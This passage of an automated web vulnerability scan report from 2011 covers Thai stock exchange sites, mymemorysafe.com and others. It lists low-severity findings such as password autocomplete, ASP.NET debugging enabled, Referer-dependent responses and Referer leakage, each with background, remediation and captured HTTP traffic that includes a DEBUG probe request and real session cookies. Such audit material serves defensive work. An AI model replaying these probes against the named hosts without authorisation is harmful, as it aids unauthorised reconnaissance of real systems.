GET /apps/serve/delivery/ajs.php?zoneid=129&cb=69750733243&charset=UTF-8&loc=http%3A//www.moneychannel.co.th/&referer=http%3A//www.set.or.th/en/contact/contact.html HTTP/1.1
Host: zeus.flexserving.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moneychannel.co.th/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:40:53 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.1.6
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: 4267881045=1; expires=Fri, 09-Aug-2019 03:13:03 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=b432be22da47a85ca24aca2652dc7c1a; expires=Wed, 02-May-2012 14:40:53 GMT; path=/
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 8305

if(typeof org=="undefined"){var org=new Object();}if(typeof org.openx=="undefined"){org.openx=new Object();}if(typeof org.openx.util=="undefined"){org.openx.util=new Object();}if(typeof org.openx.SWFO
...[SNIP]...

9. Password field with autocomplete enabled previous next
There are 5 instances of this issue:

/
/ScreeningRoom.aspx
/Subscription.aspx
/forgetpassword.aspx
/signin.aspx

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

9.1. http://www.mymemorysafe.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.mymemorysafe.com/ScreeningRoom.aspx

The form contains the following password field with autocomplete enabled:

ctl00$_contentBody$txtPassword

Request

Response

9.2. http://www.mymemorysafe.com/ScreeningRoom.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/ScreeningRoom.aspx

Issue detail

The page contains a form with the following action URL:

http://www.mymemorysafe.com/ScreeningRoom.aspx

The form contains the following password field with autocomplete enabled:

ctl00$_contentBody$txtPassword

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:20:16 GMT
Content-Length: 53115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<div id="container">
<form name="aspnetForm" method="post" action="ScreeningRoom.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left" valign="middle">

<input name="ctl00$_contentBody$txtPassword" type="password" id="ctl00__contentBody_txtPassword" class="large2_imputbox" />
</td>
...[SNIP]...

9.3. http://www.mymemorysafe.com/Subscription.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/Subscription.aspx

Issue detail

The page contains a form with the following action URL:

http://www.mymemorysafe.com/Subscription.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:19:20 GMT
Content-Length: 32413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<body>
<form name="form1" method="post" action="Subscription.aspx" id="form1">
<div>
...[SNIP]...
<td align="left" valign="middle">

<input name="txtPassword" type="password" id="txtPassword" class="large2_imputbox" />
</td>
...[SNIP]...

9.4. http://www.mymemorysafe.com/forgetpassword.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/forgetpassword.aspx

Issue detail

The page contains a form with the following action URL:

http://www.mymemorysafe.com/forgetpassword.aspx

The form contains the following password field with autocomplete enabled:

ctl00$_contentBody$txtPassword

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:19:14 GMT
Content-Length: 18411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<div id="container">
<form name="aspnetForm" method="post" action="forgetpassword.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left" valign="middle">

<input name="ctl00$_contentBody$txtPassword" type="password" id="ctl00__contentBody_txtPassword" class="large2_imputbox" />
</td>
...[SNIP]...

9.5. http://www.mymemorysafe.com/signin.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/signin.aspx

Issue detail

The page contains a form with the following action URL:

http://www.mymemorysafe.com/signin.aspx

The form contains the following password field with autocomplete enabled:

ctl00$_contentBody$txtPassword

Request

Response

10. ASP.NET debugging enabled previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://register2.set.or.th
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: register2.set.or.th
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:17:06 GMT
X-Powered-By: ASP.NET
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 39

Debug access denied to '/Default.aspx'.

11. Referer-dependent response previous next
There are 4 instances of this issue:

http://marketdata.set.or.th/mkt/ftsequotation.do
http://weblink.settrade.com/actions/customization/IPO/tfexHome_en.jsp
http://www.set.or.th/set/xcalendar.do
http://yesvideo.app101.hubspot.com/Inactive.aspx

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

11.1. http://marketdata.set.or.th/mkt/ftsequotation.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://marketdata.set.or.th
Path:	/mkt/ftsequotation.do

Request 1

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=5F6314395BD7BAE741732C9A55ED1C15; Path=/mkt
Content-Length: 55138

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.css" rel="stylesheet" type="text/css">

<title>The Stock Exchange of Thailand : FTSE SET Large Cap Quotation</title>
<META NAME="description" CONTENT=" The Stock Exchange of Thailand:Your Investment Resource for Thailand's Capital Market">
<META NAME="keywords" CONTENT="SET, thai stocks, Thailand, stock, stock exchange, Thai capital market, equity, bond, derivatives, stock market, quotes, financial, internet trading, listed companies, IPO, rules & regulations, broker, market data, investment information, news, investor education">
<script language=javascript src="/mkt/javascripts/javascript.js"></script>
<link rel="shortcut icon" href="/favicon.ico">
<style>
.background {
   background-image: url(/mkt/images/bg-body.gif);
   background-repeat: repeat-x;
   background-position: left top;
}
</style>
<script language="Javascript">
<!--
function doClear(theText) {
if (theText.value == theText.defaultValue){
theText.value = "";
}
}

function alertWindow(url){
   aWindow = window.open(url,'symbolWindow', 'scrollbars=1,menubar=no, width=550,height=400,titlebar=no,alwaysRaised=yes, left=0,top=0,screenX=0,screenY=0');
   aWindow.focus();
}

function setDestination(){
   if (document.quickQuoteForm.type.selectedIndex == 0) {
       document.quickQuoteForm.action = "http://marketdata.set.or.th/mkt/stockquotation.do?language=th&country=TH";
   } else if (document.quickQuoteForm.type.selectedIndex == 1) {
       document.quickQuoteForm.action = "http://www.set.or.th/set/companynews.do?language=th&country=TH";
   }
}

function onSubmit(){
document.searchForm.submit();
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr;
for(i=0
...[SNIP]...

Request 2

GET /mkt/ftsequotation.do?indexID=FSTHL&language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:38:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 55138

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.css" rel="stylesheet" type="text/css">

<title>The Stock Exchange of Thailand : FTSE SET Large Cap Quotation</title>
<META NAME="description" CONTENT=" The Stock Exchange of Thailand:Your Investment Resource for Thailand's Capital Market">
<META NAME="keywords" CONTENT="SET, thai stocks, Thailand, stock, stock exchange, Thai capital market, equity, bond, derivatives, stock market, quotes, financial, internet trading, listed companies, IPO, rules & regulations, broker, market data, investment information, news, investor education">
<script language=javascript src="/mkt/javascripts/javascript.js"></script>
<link rel="shortcut icon" href="/favicon.ico">
<style>
.background {
   background-image: url(/mkt/images/bg-body.gif);
   background-repeat: repeat-x;
   background-position: left top;
}
</style>
<script language="Javascript">
<!--
function doClear(theText) {
if (theText.value == theText.defaultValue){
theText.value = "";
}
}

function alertWindow(url){
   aWindow = window.open(url,'symbolWindow', 'scrollbars=1,menubar=no, width=550,height=400,titlebar=no,alwaysRaised=yes, left=0,top=0,screenX=0,screenY=0');
   aWindow.focus();
}

function setDestination(){
   if (document.quickQuoteForm.type.selectedIndex == 0) {
       document.quickQuoteForm.action = "http://marketdata.set.or.th/mkt/stockquotation.do?language=th&country=TH";
   } else if (document.quickQuoteForm.type.selectedIndex == 1) {
       document.quickQuoteForm.action = "http://www.set.or.th/set/companynews.do?language=th&country=TH";
   }
}

function onSubmit(){
document.searchForm.submit();
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr;
for(i=0; a&&i<a.length&&(x=a[i])&&x.oSrc; i++){
x.src=x.oSrc;

...[SNIP]...

11.2. http://weblink.settrade.com/actions/customization/IPO/tfexHome_en.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://weblink.settrade.com
Path:	/actions/customization/IPO/tfexHome_en.jsp

Request 1

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:37:40 GMT
Set-Cookie: JSESSIONID=104D6977DB8C724EB46CD261473A2ADF.tcipo2; Path=/
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 18444

<html>
<head>
<title>::SETTRADE::</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<link rel="stylesheet" href="/brokerpage/IPO/style.css" type="text/css">
<link rel="stylesheet" href="/brokerpage/IPO/graph_style.css" type="text/css">
<script language="javascript" src="/customization/IPO/mylib.js"></script>
<script type="text/javascript">
function showTfex() {
   tfexLayer.style.display = '';
   investLayer.style.display = 'none';
}
function showInvest() {
   tfexLayer.style.display = 'none';
   investLayer.style.display = '';
   showFuturesInvest();
}
function showFuturesInvest() {
   investFuturesLayer.style.display = '';
   investCallLayer.style.display = 'none';
   investPutLayer.style.display = 'none';
}
function showCallInvest() {
   investFuturesLayer.style.display = 'none';
   investCallLayer.style.display = '';
   investPutLayer.style.display = 'none';
}
function showPutInvest() {
   investFuturesLayer.style.display = 'none';
   investCallLayer.style.display = 'none';
   investPutLayer.style.display = '';
}
</script>
</head>
<body leftmargin="0" topmargin="5" marginwidth="0" marginheight="0"
onLoad="MM_preloadImages('/brokerpage/IPO/StaticPage/images/interface/tab_tfex.gif','/brokerpage/IPO/StaticPage/images/interface/tab_investor.gif','/brokerpage/IPO/StaticPage/images/interface/tab_tfex_active.gif','/brokerpage/IPO/StaticPage/images/interface/tab_investor_active.gif'); showTfex();">

<div id="tfexLayer">
<table width="175" height="250" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" class="graph-text">
<tr>
<td valign="top" height="18"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="18"><img src="/brokerpage/IPO/StaticPage/images/interface/tab_tfex_active.gif" width="86" height="18"></td>

...[SNIP]...

Request 2

GET /actions/customization/IPO/tfexHome_en.jsp HTTP/1.1
Host: weblink.settrade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=99FF897E4A873AB6C9CA5B3AB7752149.tcipo2

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:38:07 GMT
Set-Cookie: JSESSIONID=4D2B7DA74FA7D99184969A160BA82BFC.tcipo2; Path=/
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 306

<html><head><META HTTP-EQUIV='Content-Type' CONTENT='text/html; charset=windows-874'></head><body leftmargin=0 topmargin=0><table border=0 width='100%' height='100%' align='center'><tr align='center'><td><font size='2'>Please contact Settrade.com</font></td></tr></table></body></html>

11.3. http://www.set.or.th/set/xcalendar.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/xcalendar.do

Request 1

GET /set/xcalendar.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 70943

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.css" rel="stylesheet" type="text/css">

<title>The Stock Exchange of Thailand : Stock Calendar (Rights & Benefits)</title>
<META NAME="description" CONTENT=" The Stock Exchange of Thailand:Your Investment Resource for Thailand's Capital Market">
<META NAME="keywords" CONTENT="SET, thai stocks, Thailand, stock, stock exchange, Thai capital market, equity, bond, derivatives, stock market, quotes, financial, internet trading, listed companies, IPO, rules & regulations, broker, market data, investment information, news, investor education">
<script language=javascript src="/set/javascripts/javascript.js"></script>
<link rel="shortcut icon" href="/favicon.ico">
<style>
.background {
   background-image: url(/set/images/bg-body.gif);
   background-repeat: repeat-x;
   background-position: left top;
}
</style>
<script language="Javascript">
<!--
function doClear(theText) {
if (theText.value == theText.defaultValue){
theText.value = "";
}
}

function alertWindow(url){
   aWindow = window.open(url,'symbolWindow', 'scrollbars=1,menubar=no, width=550,height=400,titlebar=no,alwaysRaised=yes, left=0,top=0,screenX=0,screenY=0');
   aWindow.focus();
}

function setDestination(){
   if (document.quickQuoteForm.type.selectedIndex == 0) {
       document.quickQuoteForm.action = "http://marketdata.set.or.th/mkt/stockquotation.do?language=th&country=TH";
   } else if (document.quickQuoteForm.type.selectedIndex == 1) {
       document.quickQuoteForm.action = "http://www.set.or.th/set/companynews.do?language=th&country=TH";
   }
}

function onSubmit(){
document.searchForm.submit();
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr;
for(i=0; a&&i<a.length&&(x=a[i])&&x.oSrc; i++){
x.src=x.oSrc
...[SNIP]...

Request 2

GET /set/xcalendar.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:40:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=BC93B704425DD184139BFB7D2226060B; Path=/set
Content-Length: 70943

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.css" rel="stylesheet" type="text/css">

<title>The Stock Exchange of Thailand : Stock Calendar (Rights & Benefits)</title>
<META NAME="description" CONTENT=" The Stock Exchange of Thailand:Your Investment Resource for Thailand's Capital Market">
<META NAME="keywords" CONTENT="SET, thai stocks, Thailand, stock, stock exchange, Thai capital market, equity, bond, derivatives, stock market, quotes, financial, internet trading, listed companies, IPO, rules & regulations, broker, market data, investment information, news, investor education">
<script language=javascript src="/set/javascripts/javascript.js"></script>
<link rel="shortcut icon" href="/favicon.ico">
<style>
.background {
   background-image: url(/set/images/bg-body.gif);
   background-repeat: repeat-x;
   background-position: left top;
}
</style>
<script language="Javascript">
<!--
function doClear(theText) {
if (theText.value == theText.defaultValue){
theText.value = "";
}
}

function alertWindow(url){
   aWindow = window.open(url,'symbolWindow', 'scrollbars=1,menubar=no, width=550,height=400,titlebar=no,alwaysRaised=yes, left=0,top=0,screenX=0,screenY=0');
   aWindow.focus();
}

function setDestination(){
   if (document.quickQuoteForm.type.selectedIndex == 0) {
       document.quickQuoteForm.action = "http://marketdata.set.or.th/mkt/stockquotation.do?language=th&country=TH";
   } else if (document.quickQuoteForm.type.selectedIndex == 1) {
       document.quickQuoteForm.action = "http://www.set.or.th/set/companynews.do?language=th&country=TH";
   }
}

function onSubmit(){
document.searchForm.submit();
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr;
f
...[SNIP]...

11.4. http://yesvideo.app101.hubspot.com/Inactive.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://yesvideo.app101.hubspot.com
Path:	/Inactive.aspx

Request 1

GET /Inactive.aspx?type=18 HTTP/1.1
Host: yesvideo.app101.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.yesvideo.com/OrderStatus/track_your_dvd.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=EHNDOnYozQEkAAAAODQ1MDYxNWUtN2FhZi00OGEyLWEzZTgtNWNiM2UzOTc0Y2Ji0; hubspotutk=b69bfa5f-a2ea-4924-af51-3a637beccedc; HUBSPOT140=1729172652.0.0000

Response 1

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 15:19:51 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://signup.hubspot.com/setup/billing?portalId=19158&redirectToNewPortalDomain=http%3a%2f%2fwww.yesvideo.com%2fOrderStatus%2ftrack_your_dvd.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 268

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=19158&redirectToNewPortalDomain=http%3a%2f%2fwww.yesvideo.com%2fOrderStatus%2ftrack_your_dvd.aspx">here</a>.</h2>
</body></html>

Request 2

GET /Inactive.aspx?type=18 HTTP/1.1
Host: yesvideo.app101.hubspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=EHNDOnYozQEkAAAAODQ1MDYxNWUtN2FhZi00OGEyLWEzZTgtNWNiM2UzOTc0Y2Ji0; hubspotutk=b69bfa5f-a2ea-4924-af51-3a637beccedc; HUBSPOT140=1729172652.0.0000

Response 2

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 15:19:53 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://signup.hubspot.com/setup/billing?portalId=19158&redirectToNewPortalDomain=http%3a%2f%2fyesvideo.app101.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 298

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=19158&redirectToNewPortalDomain=http%3a%2f%2fyesvideo.app101.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard">here</a>.</h2>
</body></html>

12. Cookie scoped to parent domain previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304301905.0-2251237.1304340422.0-3970533.1304350017.0-2856750.1304384564.0-5143465.1304435963.0; expires=Sun, 01-May-2016 15:19:23 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

Response

13. Cross-domain Referer leakage previous next
There are 12 instances of this issue:

http://marketdata.set.or.th/mkt/ftsequotation.do
http://marketdata.set.or.th/mkt/sectorquotation.do
http://marketdata.set.or.th/mkt/stockquotation.do
http://www.sec.or.th/view/truehitsstat.jsp
http://www.sec.or.th/view/view.jsp
http://www.set.or.th/set/eventdetail.do
http://www.set.or.th/set/memberlist.do
http://www.set.or.th/set/newsdetails.do
http://www.set.or.th/set/newslist.do
http://www.set.or.th/set/newsrelease.do
http://www.set.or.th/set/oppdaybyperiod.do
http://www.set.or.th/set/xcalendar.do

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

13.1. http://marketdata.set.or.th/mkt/ftsequotation.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/ftsequotation.do

Issue detail

The page was loaded from a URL containing a query string:

http://marketdata.set.or.th/mkt/ftsequotation.do?indexID=FSTHL&language=en&country=US

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js

Request

Response

13.2. http://marketdata.set.or.th/mkt/sectorquotation.do previous next

Summary

Severity:	Information
